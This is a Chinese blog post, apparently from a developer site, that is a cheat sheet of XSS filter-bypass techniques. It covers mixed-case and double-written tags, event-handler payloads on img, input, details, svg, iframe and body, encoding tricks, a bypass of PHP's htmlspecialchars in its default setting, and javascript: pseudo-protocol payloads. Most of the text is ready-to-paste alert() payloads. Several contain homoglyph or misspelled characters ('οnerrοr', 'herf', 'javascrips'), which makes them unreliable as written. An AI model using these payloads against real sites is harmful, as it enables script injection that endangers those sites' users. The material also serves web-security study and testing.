- 1STM32+OLED屏显示字符串、汉字、图片(二)_oled显示汉字字库
- 2Kafka架构详解之分区Partition_kafka 的partition
- 3利用Qt实现可视化科学计算器_qt编写科学计算器
- 4【数据结构】队列(queue)_队列结构
- 5全方位解析ChatGPT:如何培养 AI 智能对话技能?_如何与chatgpt对话训练成友特色的ai
- 6大模型时代的基础架构,大模型算力中心建设指南重磅来袭!_大模型时代的基础架构:大模型算力中心建设指南
- 7【信息系统项目管理师】第十五章 项目风险管理 考试重点_在风险管理计划中,根据干系人风险偏好,有时可能需要转化成可量的风险临界值
- 8FAQ智能问答系统设计与实现_智能问答技术方案研究与实现
- 9OpenCV-Python图片叠加与融合,cv2.add与cv2.addWeighted的区别_图片add和numpy
- 10海光国产CPU芯片和服务器,海光CPU芯片 一文看懂国产CPU!“造不如买”时代终
xss绕过
赞
踩
1、大小写绕过
HTML对标签大小写不敏感,可以利用大小写混用绕过
例如:<script>改为<ScRiPt>
2、空格回车TAB
例如:js伪协议javascript:alert('xss');可以改为java script:alert('xss');等
3、双写绕过
有些情况的规则会将黑名单标签替换为空,可以利用这一点构造标签
例如:<script>改为<scr<script>ipt>
同理某些注释符在规则中也会替换为空,这时候可以利用它构造payload
例如:<script>改为<scr<!---test--->ipt>
4、事件绕过
就是加入一些事件 此方法可绕过大部分SRC域名过滤器,它允许将事件替换为任何标签中可用的事件类型,例如onblur,onclick
事件 描述
onclick 在用户使用鼠标左键点击对象时触发
ondblclick 用户双击对象时触发
onmousedown 用户用任何鼠标按键单击对象时触发
onmouseenter/onmouseover 用户将鼠标指针移动到对象内时触发
onmouseleave/onmouseout 用户将鼠标移出对象边界时触发
onmousemove 用户将鼠标划过对象时触发
onmouseup 用户在鼠标位于对象之上时释放鼠标按钮触发
onmousewheel 鼠标滚轮按钮旋转时触发
onpaste 用户粘贴数据以便从剪切板向文档传输数据在目标对象上时触发
onpropertychange 在对象上发生对象属性更改时触发
onkeydown 用户按下键盘按键时触发
onerror 装载文档或图像的过程中发生错误时触发
onload 加载完毕自动触发
非黑名单标签和事件
<img>
payload:<img src=1 οnerrοr=alert("xss");>
<input>
payload: <input οnfοcus="alert('xss');">
<input οnblur=alert("xss") autofocus><input autofocus> #竞争焦点,触发onblur事件
<input οnfοcus="alert('xss');" autofocus> #通过autofocus属性执行本身的focus事件
<details>
payload: <details οntοggle="alert('xss');">
<details open οntοggle="alert('xss');"> #使用open属性触发ontoggle事件
<svg>
payload: <svg οnlοad=alert("xss");>
<iframe>
payload: <iframe οnlοad=alert("xss");></iframe>
<body>
payload: <body/οnlοad=alert("xss");>
5、编码绕过
js编码、base64编码、url编码、html编码
思路:后台有可能会对代码中的关键字进行过滤,但我们可以尝试将关键字进行编码后在插入。(注意:编码在输出时是否会被正常识别和翻译才是关键,不是所有的编码都是可以的)
例1:一次编码案例
- #使用事件属性onerror()的原始payload:
- <img src=# onerror=alert"('yangshuang')"/>
-
- #使用HTML_ENTITY编码后的payload:
- <a src=x onerror="alert('yangshuang')"/>
例2:多次编码案例解析如下编码
- #原始payload
-
- <a herf="javascrips:alert(XSS)"> </a>
- #使用unicode的UTF-16编码alert这个字符
- <a herf="javascrips:\u0061\u006C\u0065\u0072\u0074(XSS)"> </a>
- #再用url编码alert的中间结果
- <a herf="javascrips:%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074(XSS)"> </a>
- #最后用html实体编码,再编码整个payload
- 太长了,略
-
6)htmlspecialchars()函数绕过:
- #该函数的语法:
- htmlspecialchars(string,flags,character-set,double_encode)
- #可用的quotestyle类型:
- ENT_COMPAT - 默认。仅编码双引号
- ENT_QUOTES - 编码双引号和单引号
- ENT_NOQUOTES - 不编码任何引号
- #预定义的字符是:
- & (和号) 成为 &
- " (双引号) 成为 "
- ’ (单引号) 成为 '
- < (小于) 成为 <
- > (大于) 成为 >
过滤原理:htmlspecialchars() 函数把预定义的字符转换为 HTML 实体,从而使XSS攻击失效。但是这个函数默认配置不会将单引号和双引号过滤,只有设置了quotestyle规定如何编码单引号和双引号才能会过滤掉单引号
- # 默认配置下,可使用以下语句绕过:
- q' onclick='alert(111)'
6、伪协议
实战日管理员难顶,但是你提交src的话 还是会收的
他过滤了on函数这些 肯定用不了 但是可以用伪协议
<a href="javascript:alert(1)">1</a>
<iframe src="javascript:alert(1)">
<img src="javascript:alert('xss')">
<table background="javascript:alert('xss')"></table>
